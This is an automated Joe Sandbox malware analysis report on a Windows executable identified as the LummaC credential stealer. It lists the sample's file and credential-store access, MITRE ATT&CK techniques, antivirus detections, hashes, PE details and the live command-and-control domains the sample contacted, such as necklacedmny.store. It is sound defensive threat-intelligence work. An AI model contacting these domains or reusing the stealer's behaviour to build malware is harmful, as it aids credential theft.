              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2199066986.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1408, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1408, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		34
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		751
              Security Software Discovery              		Remote Services41
              Data from Local System              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory34
              Virtualization/Sandbox Evasion              		Remote Desktop ProtocolData from Removable Media2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
              Obfuscated Files or Information              		NTDS1
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing              		LSA Secrets223
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe37%ReversingLabsWin32.Trojan.Generic
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              necklacedmny.store
              		188.114.96.3
              		truetrue
                		unknown
                presticitpo.store
                		unknown
                		unknowntrue
                  		unknown
                  thumbystriw.store
                  		unknown
                  		unknowntrue
                    		unknown
                    crisiwarny.store
                    		unknown
                    		unknowntrue
                      		unknown
                      fadehairucw.store
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://necklacedmny.store/apitrue
                          		unknown
                          presticitpo.storetrue
                            		unknown
                            scriptyprefej.storetrue
                              		unknown
                              necklacedmny.storetrue
                                		unknown
                                fadehairucw.storetrue
                                  		unknown
                                  navygenerayk.storetrue
                                    		unknown
                                    founpiuer.storetrue
                                      		unknown
                                      thumbystriw.storetrue
                                        		unknown
                                        crisiwarny.storetrue
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://necklacedmny.store:443/apiKfile.exe, 00000000.00000002.2294200437.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://necklacedmny.store/apiCfile.exe, 00000000.00000003.2211518965.00000000058F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://necklacedmny.store/apiSfile.exe, 00000000.00000003.2211518965.00000000058F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgfile.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2227771592.0000000005A01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://necklacedmny.store/Xfile.exe, 00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://necklacedmny.store/file.exe, 00000000.00000002.2294200437.0000000000F41000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294200437.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2198903513.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294200437.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://necklacedmny.store:443/api.default-release/key4.dbPKfile.exe, 00000000.00000002.2294200437.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://x1.c.lencr.org/0file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://x1.i.lencr.org/0file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://necklacedmny.store/Hfile.exe, 00000000.00000002.2294200437.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://necklacedmny.store/apipfile.exe, 00000000.00000002.2294200437.0000000000F41000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270741632.0000000000F99000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2288823700.0000000000FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2227771592.0000000005A01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://www.mozilla.orfile.exe, 00000000.00000003.2228046825.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctafile.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://necklacedmny.store:443/apifile.exe, 00000000.00000002.2294200437.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      188.114.96.3
                                                                      		necklacedmny.storeEuropean Union
                                                                      		13335CLOUDFLARENETUStrue

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1545194
                                                                      Start date and time:2024-10-30 08:21:10 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 5m 13s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:4
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:file.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@1/0@5/1
                                                                      EGA Information:Failed
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target file.exe, PID 1408 because there are no executed function
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: file.exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      03:22:09API Interceptor10x Sleep call for process: file.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      188.114.96.3Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • filetransfer.io/data-package/CEqTVkxM/download
                                                                      0JLWNg4Sz1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      • 977255cm.nyashkoon.in/secureWindows.php
                                                                      zxalphamn.docGet hashmaliciousLokibotBrowse
                                                                      • touxzw.ir/alpha2/five/fre.php
                                                                      QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • filetransfer.io/data-package/jI82Ms6K/download
                                                                      9D7RwuJrth.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      • 304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
                                                                      DBUfLVzZhf.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                      • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                      R5AREmpD4S.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                      • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                      7950COPY.exeGet hashmaliciousFormBookBrowse
                                                                      • www.globaltrend.xyz/b2h2/
                                                                      transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                      • paste.ee/d/Gitmx
                                                                      19387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                                                                      • www.zonguldakescortg.xyz/483l/

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      necklacedmny.storefile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                      • 188.114.97.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.97.3
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 188.114.97.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.97.3
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 188.114.97.3

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUSna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                      • 172.67.154.67
                                                                      PO.2407010.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                      • 104.21.74.191
                                                                      ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 188.114.97.3
                                                                      File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      lf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                                                                      • 188.114.97.3
                                                                      PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                      • 188.114.96.3
                                                                      Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                      • 104.21.74.191
                                                                      PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                      • 188.114.97.3

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      a0e9f5d64349fb13191bc781f81f42e1Orden de Compra.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                      • 188.114.96.3
                                                                      Orden de compra.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                      • 188.114.96.3
                                                                      z1SWIFT_MT103_Payment_552016_cmd.batGet hashmaliciousDBatLoader, FormBookBrowse
                                                                      • 188.114.96.3
                                                                      Order pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                      • 188.114.96.3
                                                                      Proforma Fatura ektedir.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                      • 188.114.96.3
                                                                      PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                      • 188.114.96.3
                                                                      Order Pdf.exeGet hashmaliciousDBatLoaderBrowse
                                                                      • 188.114.96.3
                                                                      Transferencia.xlsGet hashmaliciousUnknownBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                      • 188.114.96.3
                                                                      Orden de Compra No. 434565344657.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                      • 188.114.96.3

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      No created / dropped files found

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.5522317118284334
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:file.exe
                                                                      File size:2'958'848 bytes
                                                                      MD5:65af596c495031434154ebb5e6eb462f
                                                                      SHA1:3173f8c46d141b5df11700b69b64a92fe4f85730
                                                                      SHA256:e907eb01f5e06ae6692bae8a41628c3e754009316875627b594e090d380488d3
                                                                      SHA512:baf7ff019cabda54b8bc209a95329b0fc50ca293eb925b8d4de64f55b3344b2c670b5cccb4d4db4864aa782f991dd000d145640b1cbb9d33933f760f1bf6d4a8
                                                                      SSDEEP:49152:8ANak92RptXgJ15sMyFRTiTQkwcyNrCVtJImvFsIHCfABchVijMN:/N/2RptXgJ15JyhilHzBcDijA
                                                                      TLSH:05D53A65B50571CFD08B17B8D66BCE829C5D43BD4B2009C39C6974BA7EA3EC121FAD28
                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........00...........@..........................`0.....e.-...@.................................T...h..

                                                                      File Icon

                                                                      Icon Hash:00928e8e8686b000

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x703000
                                                                      Entrypoint Section:.taggant
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:6
                                                                      OS Version Minor:0
                                                                      File Version Major:6
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:6
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp 00007F92854D80AAh

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x5a0540x68.idata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x590000x340.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a1f80x8.idata
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      0x10000x580000x27e0082c83ced7d47c2039c2eb064280b0fb2False0.9981081014890282data7.9797333055518855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0x590000x3400x400914cd139a383496d0085d499d138ef92False0.390625data4.997389973748798IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .idata 0x5a0000x10000x200555a11fa24a077379003c187d9c9d020False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
